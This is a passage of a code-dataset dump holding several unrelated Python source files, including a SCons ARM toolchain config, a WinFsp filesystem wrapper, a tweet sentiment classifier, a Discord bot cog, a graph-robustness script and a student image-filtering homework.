env['OBJSUFFIX'] = '.o'\n env['LIBPREFIX'] = 'lib'\n env['LIBSUFFIX'] = '.a'\n env['SHCCFLAGS'] = '$CCFLAGS'\n env['SHOBJPREFIX'] = '$OBJPREFIX'\n env['SHOBJSUFFIX'] = '$OBJSUFFIX'\n env['PROGPREFIX'] = ''\n env['PROGSUFFIX'] = '.elf'\n env['RANLIB'] = CROSS_COMPILE + 'ranlib'\n env['SHLIBPREFIX'] = 'lib'\n env['SHLIBSUFFIX'] = '.so'\n\n env['LINKFLAGS'] = [ \n '-mthumb',\n '-mcpu=cortex-m3',\n '-nostartfiles',\n '-msoft-float',\n '-L'+OPENCM3_ROOT+'/lib',\n '-specs=nosys.specs',\n # Mapfile output via linker. Shows the memory map and \n # high level symbol table info \n '-Wl,-Map=${TARGET.base}.linkermap',\n '-Wl,--gc-sections',\n ]\n\n env['LIBPREFIXES'] = [ '$LIBPREFIX' ]\n env['LIBSUFFIXES'] = [ '$LIBSUFFIX' ]\n\n\n env['CCFLAGS'] = [\n '-mthumb',\n '-mcpu=cortex-m3',\n '-msoft-float',\n '-ffunction-sections',\n '-fdata-sections',\n '-fno-common',\n '-fstack-protector-all',\n '-I'+OPENCM3_ROOT+'/include',\n ]\n\n env['CCFLAGS'] = env['CCFLAGS'] + DEFS + WARNS\n\n env['CXXFLAGS'] = [\n \"-fno-exceptions\",\n \"-fno-rtti\",\n \"-fno-threadsafe-statics\",\n \"-fuse-cxa-atexit\",\n \"-Woverloaded-virtual\",\n \"-Weffc++\",\n \"-std=gnu++11\"\n ]\n\n env['CFLAGS'] = ['-std=gnu99' ]\n\n #\n # Assembler flags\n # \n env['ASFLAGS'] = [\n \"-mcpu=cortex-m3\",\n \"-mthumb\",\n \"-gdwarf-2\",\n \"-xassembler-with-cpp\",\n \"-Wa,-adhlns=${TARGET.base}.lst\",\n ]\n\n #\n # Debug\n #\n if int(ARGUMENTS.get('debug', 0)):\n env['CCFLAGS'] += ['-g', '-Os', '-DDEBUG_ON']\n else:\n env['CCFLAGS'] += ['-Os', '-g']\n\n add_builders(env)\n\n\n\n#\n# Adds custom diagnostic builders that output toolchain or platform specific diagnotic aids,\n# such as map files, srecords, etc.\ndef add_builders(env):\n #\n # Generate mapfile for debugging\n #\n def generate_map(source, target, env, for_signature):\n return '%s -dSt %s > %s' % (env['OBJDUMP'], source[0], target[0])\n\n #\n # SREC file because Paul likes them.\n #\n def generate_srec(source, target, env, for_signature):\n return '%s -O ihex %s %s' % (env['OBJCOPY'], source[0], target[0])\n\n #\n # bin file for bootloader\n #\n def generate_bin(source, target, env, for_signature):\n return '%s -O binary %s %s' % (env['OBJCOPY'], source[0], target[0])\n\n env.Append(BUILDERS=\\\n {\n 'Mapfile' : Builder(\n generator = generate_map,\n suffix = '.map',\n src_suffix = '.elf'),\n 'SRecord' : Builder(\n generator = generate_srec,\n suffix = '.srec',\n src_suffix = '.elf'),\n 'Binfile' : Builder(\n generator = generate_bin,\n suffix = '.bin',\n src_suffix = '.elf')\n })\n","sub_path":"site_scons/arm-none-gnu-eabi.toolchain.py","file_name":"arm-none-gnu-eabi.toolchain.py","file_ext":"py","file_size_in_byte":5066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"193516144","text":"from .plumbing.bindings import ffi, lib\nfrom .plumbing.file_system_interface import file_system_interface_trampoline_factory\nfrom .plumbing.winstuff import cook_ntstatus, nt_success\nfrom .exceptions import WinFSPyError, FileSystemAlreadyStarted, FileSystemNotStarted\nfrom .operations import BaseFileSystemOperations\n\n\ndef _volume_params_factory(\n sector_size=0,\n sectors_per_allocation_unit=0,\n max_component_length=0,\n volume_creation_time=0,\n volume_serial_number=0,\n transact_timeout=0,\n irp_timeout=0,\n irp_capacity=0,\n file_info_timeout=0,\n case_sensitive_search=0,\n case_preserved_names=0,\n unicode_on_disk=0,\n persistent_acls=0,\n reparse_points=0,\n reparse_points_access_check=0,\n named_streams=0,\n hard_links=0,\n extended_attributes=0,\n read_only_volume=0,\n post_cleanup_when_modified_only=0,\n pass_query_directory_pattern=0,\n always_use_double_buffering=0,\n pass_query_directory_file_name=0,\n flush_and_purge_on_cleanup=0,\n device_control=0,\n um_file_context_is_user_context2=0,\n um_file_context_is_full_context=0,\n um_reserved_flags=0,\n km_reserved_flags=0,\n prefix=\"\",\n file_system_name=\"\",\n volume_info_timeout_valid=0,\n dir_info_timeout_valid=0,\n security_timeout_valid=0,\n stream_info_timeout_valid=0,\n km_additional_reserved_flags=0,\n volume_info_timeout=0,\n dir_info_timeout=0,\n security_timeout=0,\n stream_info_timeout=0,\n):\n volume_params = ffi.new(\"FSP_FSCTL_VOLUME_PARAMS*\")\n lib.configure_FSP_FSCTL_VOLUME_PARAMS(\n volume_params,\n sector_size,\n sectors_per_allocation_unit,\n max_component_length,\n volume_creation_time,\n volume_serial_number,\n transact_timeout,\n irp_timeout,\n irp_capacity,\n file_info_timeout,\n case_sensitive_search,\n case_preserved_names,\n unicode_on_disk,\n persistent_acls,\n reparse_points,\n reparse_points_access_check,\n named_streams,\n hard_links,\n extended_attributes,\n read_only_volume,\n post_cleanup_when_modified_only,\n pass_query_directory_pattern,\n always_use_double_buffering,\n pass_query_directory_file_name,\n flush_and_purge_on_cleanup,\n device_control,\n um_file_context_is_user_context2,\n um_file_context_is_full_context,\n um_reserved_flags,\n km_reserved_flags,\n prefix,\n file_system_name,\n volume_info_timeout_valid,\n dir_info_timeout_valid,\n security_timeout_valid,\n stream_info_timeout_valid,\n km_additional_reserved_flags,\n volume_info_timeout,\n dir_info_timeout,\n security_timeout,\n stream_info_timeout,\n )\n return volume_params\n\n\nclass FileSystem:\n def __init__(self, mountpoint, operations, debug=False, **volume_params):\n self.started = False\n if not isinstance(operations, BaseFileSystemOperations):\n raise ValueError(f\"`operations` must be a `BaseFileSystemOperations` instance.\")\n\n self.mountpoint = mountpoint\n self.operations = operations\n\n self._volume_params = _volume_params_factory(**volume_params)\n set_delete_available = (\n type(operations).set_delete is not BaseFileSystemOperations.set_delete\n )\n self._file_system_interface = file_system_interface_trampoline_factory(\n set_delete_available=set_delete_available\n )\n self._file_system_ptr = ffi.new(\"FSP_FILE_SYSTEM**\")\n result = lib.FspFileSystemCreate(\n lib.WFSPY_FSP_FSCTL_DISK_DEVICE_NAME,\n self._volume_params,\n self._file_system_interface,\n self._file_system_ptr,\n )\n if not nt_success(result):\n raise WinFSPyError(f\"Cannot create file system: {cook_ntstatus(result).name}\")\n\n # Avoid GC on the handle\n self._operations_handle = ffi.new_handle(operations)\n self._file_system_ptr[0].UserContext = self._operations_handle\n\n if debug:\n lib.FspFileSystemSetDebugLogF(self._file_system_ptr[0], 1)\n\n def start(self):\n if self.started:\n raise FileSystemAlreadyStarted()\n self.started = True\n\n result = lib.FspFileSystemSetMountPoint(self._file_system_ptr[0], self.mountpoint)\n if not nt_success(result):\n raise WinFSPyError(f\"Cannot mount file system: {cook_ntstatus(result).name}\")\n result = lib.FspFileSystemStartDispatcher(self._file_system_ptr[0], 0)\n if not nt_success(result):\n raise WinFSPyError(f\"Cannot start file system dispatcher: {cook_ntstatus(result).name}\")\n\n def stop(self):\n if not self.started:\n raise FileSystemNotStarted()\n self.started = False\n\n lib.FspFileSystemStopDispatcher(self._file_system_ptr[0])\n lib.FspFileSystemDelete(self._file_system_ptr[0])\n","sub_path":"src/winfspy/file_system.py","file_name":"file_system.py","file_ext":"py","file_size_in_byte":4958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"622398915","text":"import csv\nfrom twitter_specials import *\nfrom math import *\nimport string\n\nword_counts_dict = {} # \"word\": [positive, negative, neutral, irrelevant, total counts]\ncategory_to_num = {\"positive\": 0, \"negative\":1, \"neutral\":2, \"irrelevant\": 3}\nnum_to_category = {0: \"positive\", 1: \"negative\", 2: \"neutral\", 3: \"irrelevant\"}\ntotal_entries = [0, 0, 0, 0, 0] #[positive, negative, neutral, irrelevant, total counts]\n\nexclude = set(string.punctuation)\ndef split_words(string):\n split = string.split()\n output = []\n for w in split:\n if '#' not in w and '@' not in w:\n str = \"\"\n for ch in w:\n if (ch not in exclude):\n str += ch\n output += [str]\n return output\n\n\ndef preprocessing():\n count = 0\n last_tweet = ''\n with open(\"labeled_corpus.tsv\", encoding=\"utf-8\") as csvfile:\n readCSV = csv.reader(csvfile, delimiter='\\t')\n for row in readCSV:\n line_arr = list(row)\n\n tweet = line_arr[0]\n category = str(line_arr[1])\n\n if (category not in category_to_num):\n last_tweet = last_tweet + \" \" + tweet + \" \" + category\n continue\n\n if (last_tweet != ''):\n tweet = last_tweet + \" \" + tweet\n last_tweet = ''\n\n tweet = clean_tweet(tweet, emo_repl_order, emo_repl, re_repl)\n\n words = split_words(tweet)\n word_set = set()\n for w in words:\n if '#' not in w and '@' not in w:\n word_set.add(w)\n\n total_entries[-1] += 1\n total_entries[category_to_num[category]] += 1\n for w in word_set:\n if w not in word_counts_dict:\n word_counts_dict[w] = [0, 0, 0, 0, 0]\n word_counts_dict[w][-1] += 1 #total count +1\n word_counts_dict[w][category_to_num[category]] += 1 #categorical count +1\n\n csvfile.close()\n\n\nprobabilities_dict = {} #[positive, negative, neutral, irrelevant]\ndef probabilities():\n for w, counts in word_counts_dict.items():\n probabilities_dict[w] = [counts[0]/total_entries[0], counts[1]/total_entries[1], counts[2]/total_entries[2], counts[3]/total_entries[3]] #conditional probability for each word\n for i in range(4):\n probabilities_dict[i] = log(total_entries[i]/total_entries[-1]) #prior probabilities with log\n\nresult = []\ndef classifier():\n file_object = open('locations_classified.tsv', 'w', newline='')\n writeTSV = csv.writer(file_object, delimiter='\\t')\n with open(\"geo_twits_squares.tsv\", encoding=\"utf-8\") as tsvfile:\n readTSV = csv.reader((line.replace('\\0','') for line in tsvfile), delimiter='\\t')\n for row in readTSV:\n line_arr = list(row)\n latitude = line_arr[0]\n longitude = line_arr[1]\n tweet = line_arr[2]\n tweet = clean_tweet(tweet, emo_repl_order, emo_repl, re_repl)\n\n words = split_words(tweet)\n word_set = set()\n for w in words:\n if '#' not in w and '@' not in w:\n word_set.add(w)\n\n posterior = [probabilities_dict[0], probabilities_dict[1], probabilities_dict[2], probabilities_dict[3]]\n\n for w in word_set:\n for i in range(4):\n try:\n probabilities_dict[w]\n except:\n continue\n if (probabilities_dict[w][i] != 0):\n posterior[i] += log(probabilities_dict[w][i])\n\n m = max(posterior)\n classified = [i for i, j in enumerate(posterior) if j == m]\n writeTSV.writerow([latitude, longitude, num_to_category[classified[0]]])\n #result.append([latitude, longitude, classified[0]])\n file_object.close()\n tsvfile.close()\n\nlocation_counts_dict = {}\ndef positivity_score():\n file_object = open('positivity_score.tsv', 'w', newline='')\n writeTSV = csv.writer(file_object, delimiter='\\t')\n with open(\"locations_classified.tsv\", encoding=\"utf-8\") as tsvfile:\n readTSV = csv.reader((line.replace('\\0','') for line in tsvfile), delimiter='\\t')\n for row in readTSV:\n line_arr = list(row)\n latitude = line_arr[0]\n longitude = line_arr[1]\n category = line_arr[2]\n\n if (latitude, longitude) not in location_counts_dict:\n location_counts_dict[(latitude, longitude)] = [0, 0, 0, 0]\n location_counts_dict[(latitude, longitude)][category_to_num[category]] += 1\n\n for (location, count) in location_counts_dict.items():\n total = count[0]+count[1]+count[2]+count[3]\n score = (count[0]/total-count[1]/total+1)/2\n writeTSV.writerow([location[0], location[1], score])\n\n file_object.close()\n tsvfile.close()\n\n\ndef location_data():\n first_line = True\n file_object = open('./public_html/data.js', 'w', newline='')\n file_object.write(\"var data = [\")\n with open(\"positivity_score.tsv\", encoding=\"utf-8\") as tsvfile:\n readTSV = csv.reader((line.replace('\\0','') for line in tsvfile), delimiter='\\t')\n for row in readTSV:\n line_arr = list(row)\n line_arr[0] = str(float(line_arr[0])+0.05/2)\n line_arr[1] = str(float(line_arr[1])+0.05/2)\n if first_line:\n file_object.write('{\"score\": ' + line_arr[2] + ', \"g\": ' + line_arr[1] + ', \"t\": ' + line_arr[0] + '}')\n first_line = False\n else:\n file_object.write(', {\"score\": ' + line_arr[2] + ', \"g\": ' + line_arr[1] + ', \"t\": ' + line_arr[0] + '}')\n tsvfile.close()\n file_object.write('];')\n file_object.close()\n\npreprocessing() #count tweets in training data\nprobabilities() #calculate probabilities\nclassifier() #classify and write locations_classified.tsv\npositivity_score() #calculate positivity scores and write positivity_score.tsv\nlocation_data() #write data.js\n","sub_path":"naive_bayes_classifier.py","file_name":"naive_bayes_classifier.py","file_ext":"py","file_size_in_byte":6024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"566070887","text":"import logging\nimport discord\nfrom .. import config\nfrom discord.ext import commands\nfrom ..tables import StudentData, Guild\nfrom .. import engine, postgres_engine, config\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom ..utils import find_ann_channel, permissions, fake_ctx\n\nlogger = logging.getLogger(__name__)\n\n@property\ndef mention(self):\n # NOTE: Keep an eye on Discord mobile because they might change it\n # so it does not always say '#invalid-channel' and actually shows the channel\n return f'**#{channel}**' if self.guild.owner and self.guild.owner.is_on_mobile() \\\n else f'<#{self.id}>'\n\ndiscord.TextChannel.mention = mention\n\nclass CosmicHouseKeepingCog(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.session = AsyncSession(bind=engine, binds={StudentData: postgres_engine})\n\n @commands.Cog.listener()\n async def on_ready(self):\n for guild in self.bot.guilds:\n sql_guild = await self.session.get(Guild, guild.id)\n if sql_guild is None:\n channel = find_ann_channel(guild)\n if channel is None:\n sql_guild = Guild(guild_id=guild.id)\n logger.warning(f\"The bot was unable to find the announcements channel in {guild}.\")\n if config.DM_owner:\n await guild.owner.send((f\"While looking through the text channels in **{guild}** \"\n f\"I was unable to find your announcements channel. Please use `{self.parsed_command_prefix}setann` \"\n \"to set the announcements channel.\"))\n else:\n sql_guild = Guild(guild_id=guild.id, announcements_id=channel.id)\n logger.info(f\"The bot detected '{channel}' as the announcements channel in {guild}.\")\n if config.DM_owner:\n await guild.owner.send((f\"In **{guild}**, the announcement channel was automatically set to {channel.mention}! \"\n f\"If you think this is a mistake use `{self.parsed_command_prefix}setann` to change it.\"))\n logger.info(f\"The bot sent a DM message to {guild.owner} confirming the announcements channel was correct, \"\n f\"since it is the bot's first time in {guild}.\")\n self.session.add(sql_guild)\n await self.session.commit()\n else:\n channel = guild.get_channel(sql_guild.announcements_id)\n if channel is None:\n channel = find_ann_channel(guild)\n script = f\"In **{guild}**, the announcements channel appears to have been deleted\"\n if channel is None:\n if config.DM_owner:\n await guild.owner.send(script + (f\". Please use `{self.parsed_command_prefix}setann` \"\n \"to set a new announcements channel.\"))\n else:\n sql_guild.announcements_id = channel.id\n await self.session.commit()\n if config.DM_owner:\n await guild.owner.send(script + (f\", however, I automatically detected {channel.mention} \"\n \"as the announcements channel! If you think this is a mistake \"\n f\"use `{self.parsed_command_prefix}setann` to change it.\"))\n if not permissions(channel, guild.me, 'send_messages'):\n logger_message = (f\"The bot detected '{channel}' as the announcements channel, however, \"\n \"the bot did not have the required permissions to send messages in it.\")\n if config.DM_owner:\n await guild.owner.send((f\"In **{guild}**, I detected {channel.mention} as the announcements channel, \"\n \"however, I don't have the required permissions to send messages in it. \"\n f\"If you would like to me to use {channel.mention} please give me the \"\n f\"`send messages` permission and then use the `{self.parsed_command_prefix}setann` \"\n f\"command to set {channel.mention} as the announcements channel.\"))\n logger_message += f\" {guild.owner} was sent a message notifying them of the situation.\"\n logger.warning(logger_message)\n sql_guild.announcements_id = None\n await self.session.commit()\n\n @commands.Cog.listener()\n async def on_guild_channel_update(self, before, after):\n guild = await self.session.get(Guild, after.guild.id)\n if guild.announcements_id == before.id and not permissions(after, after.guild.me, 'send_messages'):\n guild.announcements_id = None\n await self.session.commit()\n if config.DM_owner:\n await after.guild.owner.send((f\"While changing {channel.mention} you or someone in **{after.guild}** \"\n f\"accidently made it so I can no longer send messages in {channel.mention}. \"\n f\"Please use `{self.bot.parsed_command_prefix}setann` to set another announcements \"\n \"channel.\"))\n\n @commands.Cog.listener()\n async def on_guild_channel_delete(self, channel):\n guild = await self.session.get(Guild, channel.guild.id)\n if channel.id == guild.announcements_id:\n guild.announcements_id = None\n await self.session.commit()\n if config.DM_owner:\n await channel.guild.owner.send((\"You or someone in the server deleted the channel I announce birthdays in. \"\n f\"Please set a new channel with `{self.bot.parsed_command_prefix}setann`\"))\n\n @commands.Cog.listener()\n async def on_member_update(self, before, after):\n if after == self.bot.user:\n guild = await self.session.get(Guild, after.guild.id)\n missing_manage_roles = False\n if before.roles != after.roles and guild.role_id not in map(lambda role: role.id, after.roles):\n try:\n await self.bot.invoke(fake_ctx(self.bot, 'update_role', after.guild))\n except commands.BotMissingPermissions:\n logger.warning(f\"Someone in {after.guild} accidently made it so that the bot can no longer change roles.\")\n if config.DM_owner:\n await after.guild.owner.send((f\"While changing my roles, you or someone in **{after.guild}** \"\n \"made it so I can no longer update my role. Please give me the \"\n \"`manage roles` permission so I can change my role.\"))\n\n missing_manage_roles = True\n\n if guild.announcements_id:\n channel = after.guild.get_channel(guild.announcements_id)\n if not permissions(channel, after.guild.me, 'send_messages'):\n beginning = \"Additionally,\" if missing_manage_roles \\\n else f\"While changing my roles you or someone in **{after.guild}** made it so\"\n guild.announcements_id = None\n await self.session.commit()\n logger_message = (f\"Someone in {after.guild} accidently made it so that \"\n \"the bot can no longer send messsages in the announcements channel.\")\n if config.DM_owner:\n await after.guild.owner.send((f\"{beginning} I can no longer send messages in {channel_mention}. \"\n f\"Therefore, {channel_mention} is no longer the announcements channel. \"\n \"If you want to set a new announcements channel please use \"\n f\"`{self.parsed_command_prefix}setannouncements`.\"))\n logger_message += f\" A message was sent to {after.guild.owner}.\"\n logger.warning(logger_message)\n","sub_path":"bdaybot/cogs/housekeeping.py","file_name":"housekeeping.py","file_ext":"py","file_size_in_byte":8566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"245879517","text":"# Let's take task 2.3 and comment it\n\n# Here we ask user to input his name\nname = input()\n#In case user wrote extra spaces, we get rid of them\nname = name.strip()\n#Then we store message, which we'll print later in variable. Alse, on this step\n#we make name look properly, with a capital first letter\nmessage = \"Hello \" + name.title() + \", would you like to learn some Python today?\"\n\nprint(message)","sub_path":"project1/venv/chapter 2/2.10_adding_comments.py","file_name":"2.10_adding_comments.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"568836239","text":"class Solution(object):\r\n def reverseWords(self, s):\r\n \"\"\"\r\n :type s: str\r\n :rtype: str\r\n \"\"\"\r\n s = s.split()\r\n s = s[::-1]\r\n answer = ' '.join(s)\r\n return answer\r\n\r\ns = Solution()\r\nprint(s.reverseWords(\" hello world! \"))\r\n","sub_path":"CodeInterview/BD-翻转字符串中的单词(优秀答案).py","file_name":"BD-翻转字符串中的单词(优秀答案).py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"176297862","text":"# from networkGenerator import *\nfrom igraph import *\nfrom random import random as rand\nimport numpy as np\n\n#-------------------------- VULNERABILITY LIST GENERATOR ------------------------\ndef effGlobal(g, weighted=False): # global efficiency calculator\n\n eff= 0.0\n temp = []\n N = float(g.vcount())\n if weighted:\n _weight = np.array(g.es['weight'])\n _weight = np.array([1.0/x if x != 0.0 else 0 for x in _weight])\n for l in g.shortest_paths_dijkstra(weights = _weight):\n for ll in l:\n if(ll != 0):\n eff+= (1.0/ll)\n else:\n for l in g.shortest_paths_dijkstra():\n for ll in l:\n if(ll != 0):\n eff+= (1.0/ll)\n E = 0\n try:\n E = eff/(N*(N-1.0))\n except:\n pass\n return E\n\ndef calculator(g, weighted = False): # vulnerability calculator\n allEff = []\n eGlobal = effGlobal(g, weighted)\n for k in range(g.vcount()):\n g_copy = g.copy()\n list_of_ids = []\n\n for vertex_id in range(g_copy.vcount()):\n try:\n list_of_ids.append(g_copy.get_eid(k, vertex_id))\n except:\n pass\n g_copy.delete_edges(list_of_ids)\n aux = (eGlobal - effGlobal(g_copy,weighted))/eGlobal\n allEff.append(aux)\n\n _max = max(allEff)\n node_size = np.array(allEff)\n _min = min(allEff)\n\n node_size = 7+ ((node_size - _min) * (45 - 7))/(_max - _min)\n g.vs['size'] = node_size\n index = allEff.index(_max)\n return allEff\n\n#----------------- COMPONENTE GINGANTE -----------------------------\n#----------------- REMOVAL LIST GENERATOR BY METRICS -----------------------------\n\ndef removalFunction(g, metric):\n N = g.vcount()\n removaList = np.zeros(N)\n removaList[0] = 1.0\n count=1\n while g.vcount() > 1:\n _max = max(metric)\n index = metric.index(_max)\n g.delete_vertices(index)\n del metric[index]\n clusters = g.components()\n removaList[count] = max(clusters.sizes())/N\n count+=1\n return removaList\n\n\n#---------- RANDOM REMOVAL LIST GENERATOR-----------------------\n\n\ndef randomRemovalgenerator(g, simulation):\n\n N = g.vcount()\n removaList = np.zeros(N)\n\n for i in range(simulation):\n gcopy = g.copy()\n removaList[0] += 1.0\n count=1\n while gcopy.vcount() > 1:\n index = rand() * gcopy.vcount()\n index = int(index)\n gcopy.delete_vertices(index)\n clusters = gcopy.components()\n if len(clusters) > 0:\n removaList[count] += max(clusters.sizes())/float(N)\n # print(clusters.sizes())\n else:\n removaList[count] += 0.0\n count = count+1 \n removaList = removaList/simulation\n return removaList\n\n\ndef removal_methods_main(g):\n metricList = []\n N =g.vcount()\n metricNameList = []\n # remList = []\n\n # DEGREE\n degree_removal_list = removalFunction(g.copy(),g.degree())\n metricList.append(degree_removal_list)\n metricNameList.append(\"Degree\")\n\n # BETWEENNESS WITHOUT WEIGHT\n betweenness_removal_list = removalFunction(g.copy(),g.betweenness())\n metricList.append(betweenness_removal_list)\n metricNameList.append(\"Betweenness\")\n\n # BETWEENNESS WITH WEIGHT\n _weight = np.array(g.es['weight'])\n _weight = np.array([1.0/x if x != 0.0 else 0 for x in _weight])\n betweenness_removal_list = removalFunction(g.copy(),g.betweenness(weights = _weight))\n metricList.append(betweenness_removal_list)\n metricNameList.append(\"Betweenness with Weights\")\n\n # STRENGTH WEIGHT\n strength_removal_list = removalFunction(g.copy(),g.strength(weights = g.es['weight']))\n metricList.append(strength_removal_list)\n metricNameList.append(\"Strength\")\n\n # VULNERABILITY\n vulnerability_removal_list = removalFunction(g.copy(),calculator(g.copy()))\n metricList.append(vulnerability_removal_list)\n metricNameList.append(\"Vulnerability\")\n \n # VULNERABILITY WITH WEIGHTS\n vulnerability_removal_list = removalFunction(g.copy(),calculator(g.copy(), True))\n metricList.append(vulnerability_removal_list)\n metricNameList.append(\"Vulnerability with Weights\")\n \n # RANDOM REMOVAL\n random_removal_list = randomRemovalgenerator(g.copy(), 100)\n metricList.append(random_removal_list)\n metricNameList.append(\"Random\")\n return [metricList, metricNameList]\n","sub_path":"deriv/removalMethods.py","file_name":"removalMethods.py","file_ext":"py","file_size_in_byte":4474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"157922890","text":"import math\nimport PIL as pillow\nfrom PIL import Image\n\n\ndef myfilter(filt, im, sigma, threshold):\n if filt == 'gaussian':\n # window size\n sz = 6*sigma-1\n # compute kernel \n kernel = np.zeros((sz, sz))\n max_len = int(sz/2)\n twosigma = 2.0*(sigma**2)\n twopisigma = 1.0/(twosigma*np.pi)\n\n for x in range(-max_len, max_len+1):\n xsq = x**2\n for y in range(-max_len, max_len+1):\n ysq = y**2\n pwr = -1*(xsq + ysq)/twosigma\n kernel[x+max_len][y+max_len] = np.exp(pwr) * twopisigma\n\n k_sum = np.sum(kernel)\n # normalize filter to be 1\n if k_sum != 1:\n kernel = np.divide(kernel, k_sum)\n\n # apply filter to image\n xmax = im.shape[0]\n ymax = im.shape[1]\n convolve = im.copy()\n\n for x in range(0, xmax):\n for y in range(0, ymax):\n convolve[x][y] = convolve_point(x, y, im, kernel)\n return convolve\n \n elif filt == 'sobel-x':\n sobel_x = np.array([\n [-1, 0, 1],\n [-2, 0, 2],\n [-1, 0, 1] ])\n\n # apply filter to image\n xmax = im.shape[0]\n ymax = im.shape[1]\n convolve = im.copy()\n\n for x in range(0, xmax):\n for y in range(0, ymax):\n convolve[x][y] = convolve_point(x, y, im, sobel_x)\n\n for i in range(0, xmax):\n for j in range(0, ymax):\n if convolve[i][j] == threshold:\n convolve[i][j] = 0\n\n return convolve\n \n elif filt == 'sobel-y':\n sobel_y = np.array([\n [-1,-2,-1],\n [ 0, 0, 0],\n [ 1, 2, 1] ])\n\n # apply filter to image\n xmax = im.shape[0]\n ymax = im.shape[1]\n convolve = im.copy()\n\n for x in range(0, xmax):\n for y in range(0, ymax):\n convolve[x][y] = convolve_point(x, y, im, sobel_y)\n\n for i in range(0, xmax):\n for j in range(0, ymax):\n if convolve[i][j] == threshold:\n convolve[i][j] = 0\n \n return convolve\n \ndef gauss_kern(sigma):\n kernel = [[0,0,0],[0,0,0],[0,0,0]]\n ksum = 0\n for x in range(3):\n for y in range(3):\n xsq = x**2\n ysq = y**2\n twosigma = 2.0*(sigma**2)\n twopisigma = 1.0/(twosigma*math.pi)\n pwr = -1*(xsq + ysq)/twosigma\n kernel[x][y] = math.e*pwr * twopisigma\n ksum += kernel[x][y]\n mult = 10/ksum\n for x in range(3):\n for y in range(3):\n kernel[x][y] *= mult\n print(kernel)\n return kernel\n\n\ndef convolve_point(x, y, im, kernel):\n xmax = im.shape[0]\n ymax = im.shape[1]\n kxmax = kernel.shape[0]\n kymax = kernel.shape[1]\n kxmax = int(kxmax/2)\n kymax = int(kymax/2)\n conv_sum = np.int64(0)\n\n for kx in range(-kxmax, kxmax+1):\n for ky in range(-kymax, kymax+1):\n adjx = kx+x\n adjy = ky+y\n\n if adjx < 0:\n adjx = 0\n elif adjx >= xmax:\n adjx = xmax-1\n\n if adjy < 0:\n adjy = 0\n elif adjy >= ymax:\n adjy = ymax-1\n\n isum = kernel[kx+kxmax][ky+kymax] * im[adjx][adjy]\n conv_sum += isum\n return conv_sum\n\ndef non_max_suppression(im, threshold):\n xmax = im.shape[0]\n ymax = im.shape[1]\n\n suppress = im.copy()\n for x in range(0,xmax):\n for y in range(0, ymax):\n grad = gradient(x, y, im)\n gmag = np.sqrt(grad[0]**2 + grad[1]**2)\n if gmag < threshold:\n suppress[x][y] = 0\n\n for x in range(0, xmax):\n for y in range(0, ymax):\n non_max_suppress_point(x, y, suppress, suppress.copy())\n\n return suppressed\n\ndef non_max_suppress_point(x, y, im, original):\n if im[x][y] == 0:\n return\n xmax = im.shape[0]\n ymax = im.shape[1]\n grad = gradient(x, y, original)\n if grad[0] == 0:\n grad_dir = 1\n grad_dir = np.arctan(grad[1]/grad[0])\n deg = np.degrees(grad_dir)\n\n if abs(deg) > 90:\n deg = -1 * np.sign(deg) * (180 - abs(deg))\n \n if abs(deg) > 85:\n if y+1 >= ymax:\n yt = ymax-1\n yt = y+1\n \n if y == 0:\n yb = 0\n yb = y-1\n\n if original[x][y] < original[x][yt] or original[x][y] < original[x][yb]:\n im[x][y] = 0\n elif abs(deg) > 5:\n if original[x][y] < max_direc(x, y, deg, original):\n im[x][y] = 0\n else:\n if x+1 >= ymax:\n xr = xmax-1\n xr = x+1\n \n if x == 0:\n xl = 0\n xl = x-1\n\n if original[x][y] < original[xr][y] or original[x][y] < original[xl][y]:\n im[x][y] = 0\n\n\ndef max_direc(x, y, deg, im):\n xmax = im.shape[0]\n ymax = im.shape[1]\n if abs(deg) > 67.5:\n if y+1 >= ymax:\n yt = ymax-1\n yt = y+1\n if y==0:\n yb = 0\n yb = y-1\n max1 = im[x][yt]\n max2 = im[x][yb]\n elif abs(deg) > 22.5:\n if deg<0:\n if x+1 >= xmax:\n xn1 = xmax - 1\n xn1 = x+1\n if y == 0:\n yn1 = 0\n yn1 = y-1\n if x == 0:\n xn2 = 0\n xn2 = x-1\n if y+1 >= ymax:\n yn2 = ymax-1\n yn2 = y+1\n else:\n if x+1 >= xmax:\n xn2 = xmax - 1\n xn2 = x+1\n if y == 0:\n yn1 = 0\n yn1 = y-1\n if x == 0:\n xn1 = 0\n xn1 = x-1\n if y+1 >= ymax:\n yn2 = ymax-1\n yn2 = y+1\n max1 = im[xn1][yn1]\n max2 = im[xn2][yn2]\n else:\n if x+1 >= xmax:\n xr = xmax-1\n xr = x+1\n if x == 0:\n xl = 0\n xl = x-1\n\n max1 = im[xr][y]\n max2 = im[xl][y]\n\n return max(max1, max2)\n \n\ndef gradient(x, y, im):\n dfx = myfilter('sobel_x', im, 2, threshold)\n dfy = myfilter('sobel_y', im, 2, threshold)\n return np.array([dfx, dfy])\n\n\n#################################\n# Gaussian Filtering of images. #\n#################################\n\nR = mpimg.imread('red.png', 0)\nR_gauss2 = myfilter('gaussian', R, 2, 0)\n\nR_gauss5 = myfilter('gaussian', R, 5, 0)\n\n\n########################################\n# Compute Gradients with Sobel Filter. #\n########################################\n\nR_sobel_x = myfilter('sobel-x', R, 0, 250)\nR_sobel_y = myfilter('sobel-y', R, 0, 250)\n\n\n####################################\n# Perform Non-Maximum Suppression. #\n####################################\n\nR_nonmax = non_max_suppression(R, 100)\nR_plot = plt.imshow(R_nonmax)\nplt.show()\n","sub_path":"CS558/Assignments/Assignments/homework1.py","file_name":"homework1.py","file_ext":"py","file_size_in_byte":6830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"521639267","text":"#  特别hardeeee\nclass Solution(object):\n def diffWaysToCompute(self, input):\n \"\"\"\n :type input: str\n :rtype: List[int]\n 